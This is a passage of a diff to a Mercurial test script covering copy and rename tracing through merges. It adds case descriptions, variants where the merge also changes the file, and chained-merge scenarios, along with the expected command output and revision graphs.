- one with change to a file (d)
@@ -445,38 +642,43 @@
|
| The current code arbitrarily pick one side
+ $ case_desc="merge - G side: content change, F side: copy overwrite, no content change"
+
$ hg up 'desc("f-2")'
1 files updated, 0 files merged, 1 files removed, 0 files unresolved
$ hg merge 'desc("g-1")' --tool :union
- merging d
- 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ merging d (no-changeset !)
+ 0 files updated, 1 files merged, 0 files removed, 0 files unresolved (no-changeset !)
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !)
(branch merge, don't forget to commit)
- $ hg ci -m 'mFGm-0 simple merge - one way'
+ $ hg ci -m "mFGm-0 $case_desc - one way"
created new head
$ hg up 'desc("g-1")'
- 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !)
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !)
$ hg merge 'desc("f-2")' --tool :union
- merging d
- 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ merging d (no-changeset !)
+ 0 files updated, 1 files merged, 1 files removed, 0 files unresolved (no-changeset !)
+ 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !)
(branch merge, don't forget to commit)
- $ hg ci -m 'mGFm-0 simple merge - the other way'
+ $ hg ci -m "mGFm-0 $case_desc - the other way"
created new head
$ hg log -G --rev '::(desc("mGFm")+desc("mFGm"))'
- @ 29 mGFm-0 simple merge - the other way
+ @ mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way
|\
- +---o 28 mFGm-0 simple merge - one way
+ +---o mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way
| |/
- | o 25 g-1: update d
+ | o g-1: update d
| |
- o | 22 f-2: rename i -> d
+ o | f-2: rename i -> d
| |
- o | 21 f-1: rename h -> i
+ o | f-1: rename h -> i
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
@@ -491,6 +693,8 @@
In this case, the file keep on living after the merge. So we should not drop its
copy tracing chain.
+ $ case_desc="merge updated/deleted - revive the file (updated content)"
+
$ hg up 'desc("c-1")'
1 files updated, 0 files merged, 1 files removed, 0 files unresolved
$ hg merge 'desc("g-1")'
@@ -502,7 +706,7 @@
[1]
$ hg resolve -t :other d
(no more unresolved files)
- $ hg ci -m "mCGm-0"
+ $ hg ci -m "mCGm-0 $case_desc - one way"
created new head
$ hg up 'desc("g-1")'
@@ -516,23 +720,23 @@
[1]
$ hg resolve -t :local d
(no more unresolved files)
- $ hg ci -m "mGCm-0"
+ $ hg ci -m "mGCm-0 $case_desc - the other way"
created new head
$ hg log -G --rev '::(desc("mCGm")+desc("mGCm"))'
- @ 31 mGCm-0
+ @ mGCm-0 merge updated/deleted - revive the file (updated content) - the other way
|\
- +---o 30 mCGm-0
+ +---o mCGm-0 merge updated/deleted - revive the file (updated content) - one way
| |/
- | o 25 g-1: update d
+ | o g-1: update d
| |
- o | 6 c-1 delete d
+ o | c-1 delete d
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
@@ -548,13 +752,15 @@
In this case, the file keep on living after the merge. So we should not drop its
copy tracing chain.
+ $ case_desc="merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge)"
+
$ hg up 'desc("c-1")'
0 files updated, 0 files merged, 1 files removed, 0 files unresolved
$ hg merge 'desc("b-1")'
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
(branch merge, don't forget to commit)
$ hg revert --rev 'desc("b-1")' d
- $ hg ci -m "mCB-revert-m-0"
+ $ hg ci -m "mCB-revert-m-0 $case_desc - one way"
created new head
$ hg up 'desc("b-1")'
@@ -563,23 +769,23 @@
0 files updated, 0 files merged, 1 files removed, 0 files unresolved
(branch merge, don't forget to commit)
$ hg revert --rev 'desc("b-1")' d
- $ hg ci -m "mBC-revert-m-0"
+ $ hg ci -m "mBC-revert-m-0 $case_desc - the other way"
created new head
$ hg log -G --rev '::(desc("mCB-revert-m")+desc("mBC-revert-m"))'
- @ 33 mBC-revert-m-0
+ @ mBC-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way
|\
- +---o 32 mCB-revert-m-0
+ +---o mCB-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way
| |/
- | o 6 c-1 delete d
+ | o c-1 delete d
| |
- o | 5 b-1: b update
+ o | b-1: b update
|/
- o 2 i-2: c -move-> d
+ o i-2: c -move-> d, s -move-> t
|
- o 1 i-1: a -move-> c
+ o i-1: a -move-> c, p -move-> s
|
- o 0 i-0 initial commit: a b h
+ o i-0 initial commit: a b h p q r
@@ -593,43 +799,724 @@
(the copy information from the branch that was not deleted should win).
+ $ case_desc="simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch)"
+
$ hg up 'desc("i-0")'
- 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ 6 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg mv b d
$ hg ci -m "h-1: b -(move)-> d"
created new head
$ hg up 'desc("c-1")'
- 1 files updated, 0 files merged, 2 files removed, 0 files unresolved
+ 2 files updated, 0 files merged, 3 files removed, 0 files unresolved
$ hg merge 'desc("h-1")'
1 files updated, 0 files merged, 1 files removed, 0 files unresolved
(branch merge, don't forget to commit)
- $ hg ci -m "mCH-delete-before-conflict-m-0"
+ $ hg ci -m "mCH-delete-before-conflict-m-0 $case_desc - one way"
$ hg up 'desc("h-1")'
+ 2 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ $ hg merge 'desc("c-1")'
+ 1 files updated, 0 files merged, 2 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ hg ci -m "mHC-delete-before-conflict-m-0 $case_desc - the other way"
+ created new head
+ $ hg log -G --rev '::(desc("mCH-delete-before-conflict-m")+desc("mHC-delete-before-conflict-m"))'
+ @ mHC-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - the other way
+ |\
+ +---o mCH-delete-before-conflict-m-0 simple merge - C side: d is the results of renames then deleted, H side: d is result of another rename (same content as the other branch) - one way
+ | |/
+ | o h-1: b -(move)-> d
+ | |
+ o | c-1 delete d
+ | |
+ o | i-2: c -move-> d, s -move-> t
+ | |
+ o | i-1: a -move-> c, p -move-> s
+ |/
+ o i-0 initial commit: a b h p q r
+
+
+Variant of previous with extra changes introduced by the merge
+--------------------------------------------------------------
+
+Multiple cases above explicitely test cases where content are the same on both side during merge. In this section we will introduce variants for theses cases where new change are introduced to these file content during the merges.
+
+
+Subcase: merge has same initial content on both side, but merge introduced a change
+```````````````````````````````````````````````````````````````````````````````````
+
+Same as `mAEm` and `mEAm` but with extra change to the file before commiting
+
+- the "e-" branch renaming b to f (through 'g')
+- the "a-" branch renaming d to f (through e)
+
+ $ case_desc="merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent)"
+
+ $ hg up 'desc("a-2")'
+ 2 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ $ hg merge 'desc("e-2")'
+ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !)
+ 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !)
+ (branch merge, don't forget to commit)
+ $ echo "content change for mAE-change-m" > f
+ $ hg ci -m "mAE-change-m-0 $case_desc - one way"
+ created new head
+ $ hg up 'desc("e-2")'
+ 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ $ hg merge 'desc("a-2")'
+ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !)
+ 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !)
+ (branch merge, don't forget to commit)
+ $ echo "content change for mEA-change-m" > f
+ $ hg ci -m "mEA-change-m-0 $case_desc - the other way"
+ created new head
+ $ hg log -G --rev '::(desc("mAE-change-m")+desc("mEA-change-m"))'
+ @ mEA-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - the other way
+ |\
+ +---o mAE-change-m-0 merge with file update and copies info on both side - A side: rename d to f, E side: b to f, (same content for f in parent) - one way
+ | |/
+ | o e-2 g -move-> f
+ | |
+ | o e-1 b -move-> g
+ | |
+ o | a-2: e -move-> f
+ | |
+ o | a-1: d -move-> e
+ |/
+ o i-2: c -move-> d, s -move-> t
+ |
+ o i-1: a -move-> c, p -move-> s
+ |
+ o i-0 initial commit: a b h p q r
+
+
+Subcase: merge overwrite common copy information, but with extra change during the merge
+````````````````````````````````````````````````````````````````````````````````````````
+
+Merge:
+- one with change to an unrelated file (b)
+- one overwriting a file (d) with a rename (from h to i to d)
+- the merge update f content
+
+ $ case_desc="merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d)"
+
+ $ hg up 'desc("f-2")'
+ 2 files updated, 0 files merged, 2 files removed, 0 files unresolved
+#if no-changeset
+ $ hg debugindex d | ../no-linkrev
+ rev linkrev nodeid p1 p2
+ 0 * d8252ab2e760 000000000000 000000000000
+ 1 * b004912a8510 000000000000 000000000000
+ 2 * 7b79e2fe0c89 000000000000 000000000000
+ 3 * 17ec97e60577 d8252ab2e760 000000000000
+ 4 * 06dabf50734c b004912a8510 17ec97e60577
+ 5 * 19c0e3924691 17ec97e60577 b004912a8510
+ 6 * 89c873a01d97 7b79e2fe0c89 17ec97e60577
+ 7 * d55cb4e9ef57 000000000000 000000000000
+#else
+ $ hg debugindex d | ../no-linkrev
+ rev linkrev nodeid p1 p2
+ 0 * ae258f702dfe 000000000000 000000000000
+ 1 * b004912a8510 000000000000 000000000000
+ 2 * 5cce88bf349f ae258f702dfe 000000000000
+ 3 * cc269dd788c8 b004912a8510 5cce88bf349f
+ 4 * 51c91a115080 5cce88bf349f b004912a8510
+#endif
+ $ hg up 'desc("b-1")'
+ 3 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !)
+ 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !)
+ $ hg merge 'desc("f-2")'
+ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !)
+ 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !)
+ (branch merge, don't forget to commit)
+ $ echo "extra-change to (formelly h) during the merge" > d
+ $ hg ci -m "mBF-change-m-0 $case_desc - one way"
+ created new head
+ $ hg manifest --rev . --debug | grep " d"
+ 1c334238bd42ec85c6a0d83fd1b2a898a6a3215d 644 d (no-changeset !)
+ cea2d99c0fde64672ef61953786fdff34f16e230 644 d (changeset !)
+
+ $ hg up 'desc("f-2")'
+ 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ $ hg merge 'desc("b-1")'
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ echo "extra-change to (formelly h) during the merge" > d
+ $ hg ci -m "mFB-change-m-0 $case_desc - the other way"
+ created new head
+ $ hg manifest --rev . --debug | grep " d"
+ 1c334238bd42ec85c6a0d83fd1b2a898a6a3215d 644 d (no-changeset !)
+ cea2d99c0fde64672ef61953786fdff34f16e230 644 d (changeset !)
+#if no-changeset
+ $ hg debugindex d | ../no-linkrev
+ rev linkrev nodeid p1 p2
+ 0 * d8252ab2e760 000000000000 000000000000
+ 1 * b004912a8510 000000000000 000000000000
+ 2 * 7b79e2fe0c89 000000000000 000000000000
+ 3 * 17ec97e60577 d8252ab2e760 000000000000
+ 4 * 06dabf50734c b004912a8510 17ec97e60577
+ 5 * 19c0e3924691 17ec97e60577 b004912a8510
+ 6 * 89c873a01d97 7b79e2fe0c89 17ec97e60577
+ 7 * d55cb4e9ef57 000000000000 000000000000
+ 8 * 1c334238bd42 7b79e2fe0c89 000000000000
+#else
+ $ hg debugindex d | ../no-linkrev
+ rev linkrev nodeid p1 p2
+ 0 * ae258f702dfe 000000000000 000000000000
+ 1 * b004912a8510 000000000000 000000000000
+ 2 * 5cce88bf349f ae258f702dfe 000000000000
+ 3 * cc269dd788c8 b004912a8510 5cce88bf349f
+ 4 * 51c91a115080 5cce88bf349f b004912a8510
+ 5 * cea2d99c0fde ae258f702dfe 000000000000
+#endif
+ $ hg log -G --rev '::(desc("mBF-change-m")+desc("mFB-change-m"))'
+ @ mFB-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - the other way
+ |\
+ +---o mBF-change-m-0 merge with extra change - B side: unrelated change, F side: overwrite d with a copy (from h->i->d) - one way
+ | |/
+ | o f-2: rename i -> d
+ | |
+ | o f-1: rename h -> i
+ | |
+ o | b-1: b update
+ |/
+ o i-2: c -move-> d, s -move-> t
+ |
+ o i-1: a -move-> c, p -move-> s
+ |
+ o i-0 initial commit: a b h p q r
+
+
+Subcase: restoring and untouched deleted file, while touching it
+````````````````````````````````````````````````````````````````
+
+Merge:
+- one removing a file (d)
+- one leaving the file untouched
+- the merge actively restore the file to the same content.
+
+In this case, the file keep on living after the merge. So we should not drop its
+copy tracing chain.
+
+ $ case_desc="merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge)"
+
+ $ hg up 'desc("c-1")'
+ 2 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ $ hg merge 'desc("b-1")'
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ hg revert --rev 'desc("b-1")' d
+ $ echo "new content for d after the revert" > d
+ $ hg ci -m "mCB-change-m-0 $case_desc - one way"
+ created new head
+ $ hg manifest --rev . --debug | grep " d"
+ e333780c17752a3b0dd15e3ad48aa4e5c745f621 644 d (no-changeset !)
+ 4b540a18ad699234b2b2aa18cb69555ac9c4b1df 644 d (changeset !)
+
+ $ hg up 'desc("b-1")'
1 files updated, 0 files merged, 0 files removed, 0 files unresolved
$ hg merge 'desc("c-1")'
0 files updated, 0 files merged, 1 files removed, 0 files unresolved
(branch merge, don't forget to commit)
- $ hg ci -m "mHC-delete-before-conflict-m-0"
+ $ hg revert --rev 'desc("b-1")' d
+ $ echo "new content for d after the revert" > d
+ $ hg ci -m "mBC-change-m-0 $case_desc - the other way"
+ created new head
+ $ hg manifest --rev . --debug | grep " d"
+ e333780c17752a3b0dd15e3ad48aa4e5c745f621 644 d (no-changeset !)
+ 4b540a18ad699234b2b2aa18cb69555ac9c4b1df 644 d (changeset !)
+
+
+ $ hg up null --quiet
+ $ hg log -G --rev '::(desc("mCB-change-m")+desc("mBC-change-m"))'
+ o mBC-change-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way
+ |\
+ +---o mCB-change-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way
+ | |/
+ | o c-1 delete d
+ | |
+ o | b-1: b update
+ |/
+ o i-2: c -move-> d, s -move-> t
+ |
+ o i-1: a -move-> c, p -move-> s
+ |
+ o i-0 initial commit: a b h p q r
+
+
+Decision from previous merge are properly chained with later merge
+------------------------------------------------------------------
+
+Subcase: chaining conflicting rename resolution
+```````````````````````````````````````````````
+
+The "mAEm" and "mEAm" case create a rename tracking conflict on file 'f'. We
+add more change on the respective branch and merge again. These second merge
+does not involve the file 'f' and the arbitration done within "mAEm" and "mEA"
+about that file should stay unchanged.
+
+We also touch J during some of the merge to check for unrelated change to new file during merge.
+
+ $ case_desc="chained merges (conflict -> simple) - same content everywhere"
+
+(extra unrelated changes)
+
+ $ hg up 'desc("a-2")'
+ 6 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ $ echo j > unrelated-j
+ $ hg add unrelated-j
+ $ hg ci -m 'j-1: unrelated changes (based on the "a" series of changes)'
+ created new head
+
+ $ hg up 'desc("e-2")'
+ 2 files updated, 0 files merged, 2 files removed, 0 files unresolved (no-changeset !)
+ 1 files updated, 0 files merged, 2 files removed, 0 files unresolved (changeset !)
+ $ echo k > unrelated-k
+ $ hg add unrelated-k
+ $ hg ci -m 'k-1: unrelated changes (based on "e" changes)'
+ created new head
+
+(merge variant 1)
+
+ $ hg up 'desc("mAEm")'
+ 1 files updated, 0 files merged, 2 files removed, 0 files unresolved (no-changeset !)
+ 0 files updated, 0 files merged, 2 files removed, 0 files unresolved (changeset !)
+ $ hg merge 'desc("k-1")'
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ hg ci -m "mAE,Km: $case_desc"
+
+(merge variant 2)
+
+ $ hg up 'desc("k-1")'
+ 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !)
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !)
+
+ $ hg merge 'desc("mAEm")'
+ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !)
+ 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !)
+ (branch merge, don't forget to commit)
+ $ hg ci -m "mK,AEm: $case_desc"
+ created new head
+
+(merge variant 3)
+
+ $ hg up 'desc("mEAm")'
+ 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ $ hg merge 'desc("j-1")'
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ echo jj > unrelated-j
+ $ hg ci -m "mEA,Jm: $case_desc"
+
+(merge variant 4)
+
+ $ hg up 'desc("j-1")'
+ 3 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !)
+ 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !)
+ $ hg merge 'desc("mEAm")'
+ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !)
+ 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !)
+ (branch merge, don't forget to commit)
+ $ echo jj > unrelated-j
+ $ hg ci -m "mJ,EAm: $case_desc"
created new head
- $ hg log -G --rev '::(desc("mCH-delete-before-conflict-m")+desc("mHC-delete-before-conflict-m"))'
- @ 36 mHC-delete-before-conflict-m-0
+
+
+ $ hg log -G --rev '::(desc("mAE,Km") + desc("mK,AEm") + desc("mEA,Jm") + desc("mJ,EAm"))'
+ @ mJ,EAm: chained merges (conflict -> simple) - same content everywhere
|\
- +---o 35 mCH-delete-before-conflict-m-0
+ +---o mEA,Jm: chained merges (conflict -> simple) - same content everywhere
| |/
- | o 34 h-1: b -(move)-> d
+ | | o mK,AEm: chained merges (conflict -> simple) - same content everywhere
+ | | |\
+ | | +---o mAE,Km: chained merges (conflict -> simple) - same content everywhere
+ | | | |/
+ | | | o k-1: unrelated changes (based on "e" changes)
+ | | | |
+ | o | | j-1: unrelated changes (based on the "a" series of changes)
+ | | | |
+ o-----+ mEAm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - the other way
+ |/ / /
+ | o / mAEm-0 merge with copies info on both side - A side: rename d to f, E side: b to f, (same content for f) - one way
+ |/|/
+ | o e-2 g -move-> f
+ | |
+ | o e-1 b -move-> g
+ | |
+ o | a-2: e -move-> f
+ | |
+ o | a-1: d -move-> e
+ |/
+ o i-2: c -move-> d, s -move-> t
+ |
+ o i-1: a -move-> c, p -move-> s
+ |
+ o i-0 initial commit: a b h p q r
+
+
+Subcase: chaining conflicting rename resolution, with actual merging happening
+``````````````````````````````````````````````````````````````````````````````
+
+The "mPQm" and "mQPm" case create a rename tracking conflict on file 't'. We
+add more change on the respective branch and merge again. These second merge
+does not involve the file 't' and the arbitration done within "mPQm" and "mQP"
+about that file should stay unchanged.
+
+ $ case_desc="chained merges (conflict -> simple) - different content"
+
+(extra unrelated changes)
+
+ $ hg up 'desc("p-2")'
+ 3 files updated, 0 files merged, 3 files removed, 0 files unresolved
+ $ echo s > unrelated-s
+ $ hg add unrelated-s
+ $ hg ci -m 's-1: unrelated changes (based on the "p" series of changes)'
+ created new head
+
+ $ hg up 'desc("q-2")'
+ 2 files updated, 0 files merged, 2 files removed, 0 files unresolved
+ $ echo t > unrelated-t
+ $ hg add unrelated-t
+ $ hg ci -m 't-1: unrelated changes (based on "q" changes)'
+ created new head
+
+(merge variant 1)
+
+ $ hg up 'desc("mPQm")'
+ 1 files updated, 0 files merged, 2 files removed, 0 files unresolved
+ $ hg merge 'desc("t-1")'
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ hg ci -m "mPQ,Tm: $case_desc"
+
+(merge variant 2)
+
+ $ hg up 'desc("t-1")'
+ 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
+
+ $ hg merge 'desc("mPQm")'
+ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ hg ci -m "mT,PQm: $case_desc"
+ created new head
+
+(merge variant 3)
+
+ $ hg up 'desc("mQPm")'
+ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ $ hg merge 'desc("s-1")'
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ hg ci -m "mQP,Sm: $case_desc"
+
+(merge variant 4)
+
+ $ hg up 'desc("s-1")'
+ 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ $ hg merge 'desc("mQPm")'
+ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ hg ci -m "mS,QPm: $case_desc"
+ created new head
+ $ hg up null --quiet
+
+
+ $ hg log -G --rev '::(desc("mPQ,Tm") + desc("mT,PQm") + desc("mQP,Sm") + desc("mS,QPm"))'
+ o mS,QPm: chained merges (conflict -> simple) - different content
+ |\
+ +---o mQP,Sm: chained merges (conflict -> simple) - different content
+ | |/
+ | | o mT,PQm: chained merges (conflict -> simple) - different content
+ | | |\
+ | | +---o mPQ,Tm: chained merges (conflict -> simple) - different content
+ | | | |/
+ | | | o t-1: unrelated changes (based on "q" changes)
+ | | | |
+ | o | | s-1: unrelated changes (based on the "p" series of changes)
+ | | | |
+ o-----+ mQPm-0 merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content) - the other way
+ |/ / /
+ | o / mPQm-0 merge with copies info on both side - P side: rename t to v, Q side: r to v, (different content) - one way
+ |/|/
+ | o q-2 w -move-> v
+ | |
+ | o q-1 r -move-> w
+ | |
+ o | p-2: u -move-> v
| |
- o | 6 c-1 delete d
- | |
- o | 2 i-2: c -move-> d
+ o | p-1: t -move-> u
+ |/
+ o i-2: c -move-> d, s -move-> t
+ |
+ o i-1: a -move-> c, p -move-> s
+ |
+ o i-0 initial commit: a b h p q r
+
+
+Subcase: chaining salvage information during a merge
+````````````````````````````````````````````````````
+
+We add more change on the branch were the file was deleted. merging again
+should preserve the fact eh file was salvaged.
+
+ $ case_desc="chained merges (salvaged -> simple) - same content (when the file exists)"
+
+(creating the change)
+
+ $ hg up 'desc("c-1")'
+ 5 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ $ echo l > unrelated-l
+ $ hg add unrelated-l
+ $ hg ci -m 'l-1: unrelated changes (based on "c" changes)'
+ created new head
+
+(Merge variant 1)
+
+ $ hg up 'desc("mBC-revert-m")'
+ 2 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ $ hg merge 'desc("l-1")'
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ hg ci -m "mBC+revert,Lm: $case_desc"
+
+(Merge variant 2)
+
+ $ hg up 'desc("mCB-revert-m")'
+ 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ $ hg merge 'desc("l-1")'
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ hg ci -m "mCB+revert,Lm: $case_desc"
+
+(Merge variant 3)
+
+ $ hg up 'desc("l-1")'
+ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
+
+ $ hg merge 'desc("mBC-revert-m")'
+ 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ hg ci -m "mL,BC+revertm: $case_desc"
+ created new head
+
+(Merge variant 4)
+
+ $ hg up 'desc("l-1")'
+ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved
+
+ $ hg merge 'desc("mCB-revert-m")'
+ 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ hg ci -m "mL,CB+revertm: $case_desc"
+ created new head
+
+ $ hg log -G --rev '::(desc("mBC+revert,Lm") + desc("mCB+revert,Lm") + desc("mL,BC+revertm") + desc("mL,CB+revertm"))'
+ @ mL,CB+revertm: chained merges (salvaged -> simple) - same content (when the file exists)
+ |\
+ | | o mL,BC+revertm: chained merges (salvaged -> simple) - same content (when the file exists)
+ | |/|
+ +-+---o mCB+revert,Lm: chained merges (salvaged -> simple) - same content (when the file exists)
+ | | |
+ | +---o mBC+revert,Lm: chained merges (salvaged -> simple) - same content (when the file exists)
+ | | |/
+ | o | l-1: unrelated changes (based on "c" changes)
+ | | |
+ | | o mBC-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - the other way
+ | |/|
+ o---+ mCB-revert-m-0 merge explicitely revive deleted file - B side: unrelated change, C side: delete d (restored by merge) - one way
+ |/ /
+ o | c-1 delete d
| |
- o | 1 i-1: a -move-> c
+ | o b-1: b update
|/
- o 0 i-0 initial commit: a b h
+ o i-2: c -move-> d, s -move-> t
+ |
+ o i-1: a -move-> c, p -move-> s
+ |
+ o i-0 initial commit: a b h p q r
+Subcase: chaining "merged" information during a merge
+``````````````````````````````````````````````````````
+
+When a non-rename change are merged with a copy overwrite, the merge pick the copy source from (p1) as the reference. We should preserve this information in subsequent merges.
+
+ $ case_desc="chained merges (copy-overwrite -> simple) - same content"
+
+(extra unrelated changes)
+
+ $ hg up 'desc("f-2")'
+ 2 files updated, 0 files merged, 2 files removed, 0 files unresolved (no-changeset !)
+ 1 files updated, 0 files merged, 2 files removed, 0 files unresolved (changeset !)
+ $ echo n > unrelated-n
+ $ hg add unrelated-n
+ $ hg ci -m 'n-1: unrelated changes (based on the "f" series of changes)'
+ created new head
+
+ $ hg up 'desc("g-1")'
+ 2 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ $ echo o > unrelated-o
+ $ hg add unrelated-o
+ $ hg ci -m 'o-1: unrelated changes (based on "g" changes)'
+ created new head
+
+(merge variant 1)
+
+ $ hg up 'desc("mFGm")'
+ 1 files updated, 0 files merged, 2 files removed, 0 files unresolved (no-changeset !)
+ 0 files updated, 0 files merged, 2 files removed, 0 files unresolved (changeset !)
+ $ hg merge 'desc("o-1")'
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ hg ci -m "mFG,Om: $case_desc"
+
+(merge variant 2)
+
+ $ hg up 'desc("o-1")'
+ 2 files updated, 0 files merged, 0 files removed, 0 files unresolved (no-changeset !)
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved (changeset !)
+ $ hg merge 'desc("FGm")'
+ 1 files updated, 0 files merged, 1 files removed, 0 files unresolved (no-changeset !)
+ 0 files updated, 0 files merged, 1 files removed, 0 files unresolved (changeset !)
+ (branch merge, don't forget to commit)
+ $ hg ci -m "mO,FGm: $case_desc"
+ created new head
+
+(merge variant 3)
+
+ $ hg up 'desc("mGFm")'
+ 0 files updated, 0 files merged, 1 files removed, 0 files unresolved
+ $ hg merge 'desc("n-1")'
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ hg ci -m "mGF,Nm: $case_desc"
+
+(merge variant 4)
+
+ $ hg up 'desc("n-1")'
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ $ hg merge 'desc("mGFm")'
+ 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
+ (branch merge, don't forget to commit)
+ $ hg ci -m "mN,GFm: $case_desc"
+ created new head
+
+ $ hg log -G --rev '::(desc("mFG,Om") + desc("mO,FGm") + desc("mGF,Nm") + desc("mN,GFm"))'
+ @ mN,GFm: chained merges (copy-overwrite -> simple) - same content
+ |\
+ +---o mGF,Nm: chained merges (copy-overwrite -> simple) - same content
+ | |/
+ | | o mO,FGm: chained merges (copy-overwrite -> simple) - same content
+ | | |\
+ | | +---o mFG,Om: chained merges (copy-overwrite -> simple) - same content
+ | | | |/
+ | | | o o-1: unrelated changes (based on "g" changes)
+ | | | |
+ | o | | n-1: unrelated changes (based on the "f" series of changes)
+ | | | |
+ o-----+ mGFm-0 merge - G side: content change, F side: copy overwrite, no content change - the other way
+ |/ / /
+ | o / mFGm-0 merge - G side: content change, F side: copy overwrite, no content change - one way
+ |/|/
+ | o g-1: update d
+ | |
+ o | f-2: rename i -> d
+ | |
+ o | f-1: rename h -> i
+ |/
+ o i-2: c -move-> d, s -move-> t
+ |
+ o i-1: a -move-> c, p -move-> s
+ |
+ o i-0 initial commit: a b h p q r
+
+
+Subcase: chaining conflicting rename resolution, with extra change during the merge
+```````````````````````````````````````````````````````````````````````````````````
+
+The "mEA-change-m-0" and "mAE-change-m-0" case create a rename tracking conflict on file 'f'. We
+add more change on the respective branch and merge again. These second merge
+does not involve the file 'f' and the arbitration done within "mAEm" and "mEA"
+about that file should stay unchanged.
+
+ $ case_desc="chained merges (conflict+change -> simple) - same content on both branch in the initial merge"
+
+
+(merge variant 1)
+
+ $ hg up 'desc("mAE-change-m")'
+ 2 files updated, 0 files merged, 3 files removed, 0 files unresolved
+ $ hg merge 'desc("k-1")'
